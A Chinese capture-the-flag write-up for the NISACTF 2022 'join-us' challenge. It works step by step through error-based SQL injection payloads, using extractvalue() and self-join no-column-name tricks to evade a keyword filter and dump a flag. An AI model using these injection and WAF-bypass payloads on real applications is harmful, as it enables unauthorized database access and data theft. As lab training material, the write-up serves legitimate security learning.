[NISACTF 2022]join-us - 报错注入&无列名注入

点击登录,找到注入点

这种框,可以直接爆破关键字,看是否拦截,也可以手动尝试,发现=、union、and、or、substr、database等关键字都拦截了

1、学到了:可以用数据库中不存在的表名或者不存在的自定义函数名爆出数据库名,1'-a()#1' || (select * from aa)#

FUNCTION sqlsql.a does not exist

2、直接甩一个报错注入上去,extractvalue(0,concat(0x7e,1,0x7e));#

没拦截,说明可以试一下

3、1' || extractvalue(0,concat(0x7e,1,0x7e));#

XPATH syntax error: '~ 1 ~',说明报错成功了

4、1' || extractvalue(0,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),1,30),0x7e));#

XPATH syntax error: '~ Fal_flag,output ~'

5、1' || extractvalue(0,concat(0x7e,mid((select group_concat(column_name) from Fal_flag),1,100),0x7e));#

不要耍小心思喔~ ------ column被waf,无列名注入

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag as a join Fal_flag as b)as c),1,100),0x7e));#

不要耍小心思喔~ ------ as被waf,去掉as

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b) c),1,100),0x7e));#

Duplicate column name 'id'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id)) c),1,100),0x7e));#

Duplicate column name 'data'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from Fal_flag a join Fal_flag b using(id,data)) c),1,100),0x7e));#

Duplicate column name 'i_tell_u_this_is_Fal(se)_flag_is_in_another' ------ flag在另一个表(output)

6、1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b) c),1,100),0x7e));#

Duplicate column name 'data'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),1,100),0x7e));#

XPATH syntax error: '~ NSSCTF{77a4667a-b16e-46a6-87...'

1' || extractvalue(0,concat(0x7e,mid((select * from (select * from output a join output b using(data)) c),20,100),0x7e));#

XPATH syntax error: '~ e-46a6-87fc-f981f48eeb5c} ~'

相关推荐
Fortinet_CHINA7 分钟前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全
醇醛酸醚酮酯19 分钟前
Qt项目锻炼——TODO清单(二)
开发语言·数据库·qt
GreatSQL社区1 小时前
用systemd管理GreatSQL服务详解
数据库·mysql·greatsql
掘根1 小时前
【MySQL进阶】错误日志,二进制日志,mysql系统库
数据库·mysql
weixin_438335401 小时前
基础知识:mysql-connector-j依赖
数据库·mysql
小明铭同学1 小时前
MySQL 八股文【持续更新ing】
数据库·mysql
Mr_Xuhhh1 小时前
信号与槽的总结
java·开发语言·数据库·c++·qt·系统架构
Fireworkitte2 小时前
Redis 源码 tar 包安装 Redis 哨兵模式(Sentinel)
数据库·redis·sentinel
网安小白的进阶之路2 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全